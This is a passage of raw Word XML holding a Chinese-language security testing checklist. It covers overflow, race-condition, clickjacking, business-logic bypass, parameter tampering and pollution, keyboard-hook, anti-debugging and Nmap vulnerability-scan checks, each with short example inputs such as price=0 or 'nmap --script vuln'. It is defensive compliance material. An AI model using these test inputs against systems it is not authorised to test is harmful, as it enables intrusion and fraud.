          <w:p w14:paraId="08177065">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63F9887">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50CB319B">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32CAC6E4">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23</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缓冲区栈溢出</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E3AFADA">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构造恶意输入覆盖返回地址（如AAAABBBBCCCC...），触发程序异常。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="46214BA8">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1A5F4543">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2E80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479" w:type="dxa"/>
            <w:vMerge w:val="continue"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0D8D0F6B">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7954539">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48D953E">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76B28EF">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24</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缓冲区越界操作</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="36A336FA">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·通过数组索引越界（如array[100000]）测试内存越界访问</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="17CE82F5">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5AC77C3D">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4847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479" w:type="dxa"/>
            <w:vMerge w:val="continue"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="02610B9B">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006EA3C">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0454F118">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A361285">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25</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整数溢出</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="49B1E269">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·输入超大数值（如2147483647+1），验证是否导致逻辑错误</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="66ED7D3C">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4A62ABB6">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78DE2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479" w:type="dxa"/>
            <w:vMerge w:val="continue"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7BEE3DA3">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DBF8854">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7DDF0EF">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40BECF4D">
            <w:pP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26</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同步错误</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="732385E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·竞态条件漏洞验证 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5870C263">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并发请求余额提现接口，检查是否超额提现（如10次请求扣款1次）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7CBBEA4A">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40E83C41">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0101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1479" w:type="dxa"/>
            <w:vMerge w:val="continue"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0F6CF52E">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620696CA">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1D39C40">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37CEA970">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27</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意外处理错误</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E470475">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·异常处理缺陷测试 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E1E071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触发系统错误（如除零操作），验证是否暴露堆栈跟踪信息。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="431534D3">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7CE9F917">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09D9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479" w:type="dxa"/>
            <w:vMerge w:val="continue"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0DC1968F">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6B9A51E">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2B006071">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7FBA75CD">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28</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点击劫持</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F4635C8">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·页面嵌套劫持检测</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4880A225">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测试是否缺失X-Frame-Options头或</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>frame-ancestors</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t> CSP指令。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="468BB63D">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7A20B8CB">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5EC3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479" w:type="dxa"/>
            <w:vMerge w:val="continue"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="127F346D">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50AF0F8">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7FCB3CD8">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1789649F">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29</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过程验证缺失</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0CE5F757">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·业务逻辑绕过测试</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="32EA3A1B">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 xml:space="preserve">跳过支付步骤直接访问订单完成接口（如POST </w:t>
            </w:r>
            <w:bookmarkStart w:id="0" w:name="_GoBack"/>
            <w:bookmarkEnd w:id="0"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>/order/complete）。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="700F58AD">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shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7DEC7755">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>不存在支付功能</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="745A12E1">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:kern w:val="2"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="946785" cy="469265"/>
                  <wp:effectExtent l="0" t="0" r="5715"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45"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="946785" cy="469265"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="093EA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1479" w:type="dxa"/>
            <w:vMerge w:val="continue"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6D78DC01">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09D1530">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3542B1F9">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3B3375B5">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30</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HTTP参数篡改</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="403773A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·参数篡改攻击验证</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5AB267A2">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修改price=100→</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>price=0</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>，验证后端是否校验参数合法性。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="040FBFE2">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0F672EE9">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71B36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exact"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1479" w:type="dxa"/>
            <w:vMerge w:val="continue"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="766592C0">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1BBB701">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tcBorders>
              <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="09686088">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5762" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="010750CB">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31</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>HTTP参数污染</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="10B32975">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w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>多参数混淆测试</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="044BF99B">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提交重复参数（如</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>user=admin&amp;user=guest</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>），检查后端处理逻辑是否混乱。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7779CA84">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tcBorders>
              <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="234F607F">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1724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exact"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1479" w:type="dxa"/>
            <w:vMerge w:val="continue"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="358C35D9">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5EFAA058">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FABF8F" w:themeFill="accent6" w:themeFillTint="99"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="59650520">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C/S客户端</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E8992A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1.1键盘消息记录</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4FE639F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w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>.2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>动态调试防护</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5762" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FABF8F" w:themeFill="accent6" w:themeFillTint="99"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7D7D0B57">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.1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>键盘消息记录</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4E4B9FF0">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恶意软件可以通过</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="ArialMT" w:hAnsi="Times New Roman" w:eastAsia="ArialMT" w:cs="ArialMT"/>
                <w:kern w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> SetWindowsHoo</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="ArialMT" w:hAnsi="Times New Roman" w:eastAsia="ArialMT" w:cs="ArialMT"/>
                <w:kern w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>k</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="ArialMT" w:hAnsi="Times New Roman" w:eastAsia="ArialMT" w:cs="ArialMT"/>
                <w:kern w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">EX </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="ArialMT" w:hAnsi="Times New Roman" w:eastAsia="ArialMT" w:cs="ArialMT"/>
                <w:kern w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>函数</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>，这个函数进行全局消息钩取，得到目标的。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FABF8F" w:themeFill="accent6" w:themeFillTint="99"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="46438BC9">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shd w:val="clear" w:color="auto" w:fill="FABF8F" w:themeFill="accent6" w:themeFillTint="99"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="28567071">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□已测</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="0DE8A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4" w:hRule="exact"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1479" w:type="dxa"/>
            <w:vMerge w:val="continue"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6AB793D4">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FAF2660">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FABF8F" w:themeFill="accent6" w:themeFillTint="99"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1D5FFC1B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5762" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FABF8F" w:themeFill="accent6" w:themeFillTint="99"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3EE681D4">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.2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>动态调试防护</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="47EECE4C">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检查客户端程序是否存在动态</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="06575960">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>调试的防护功能，使用</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>X64DBG</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>和</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>OLLYDBG</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>对客户端程序进行动态调试检测。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FABF8F" w:themeFill="accent6" w:themeFillTint="99"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="600C68E0">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572051A2">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="7489F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1479" w:type="dxa"/>
            <w:vMerge w:val="continue"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="777FADD6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2838" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="783CF4FB">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e）应能发现可能存在的已知漏洞，并在经过充分测试评估后，及时修补漏洞；</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="738560BC">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4.32Web漏洞</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="558F4655">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4.33操作系统及通用软件漏洞</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5762" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="010FDF2D">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1.Web漏洞</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3597289D">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·对网站和进行指纹扫描、或人工经验识别网站使用的通用CMS架构、寻找历史公开漏洞进行漏洞复现。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3FA0C9B1">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221D9F7D">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74D0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1479" w:type="dxa"/>
            <w:vMerge w:val="continue"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="58728E7C">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tcBorders>
              <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3DD1131F">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tcBorders>
              <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="18D77191">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5762" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0614ADA0">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2.操作系统及通用软件漏洞</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="37D65E3C">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·对系统使用Nmap脚本引擎（nmap-sV--script vuln）检测开放服务（如SSH、SMB）的已知漏洞（如永恒之蓝）</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C2C9155">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注：根据现场判断，如已知漏洞（如永恒之蓝）为高危</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:tcBorders>
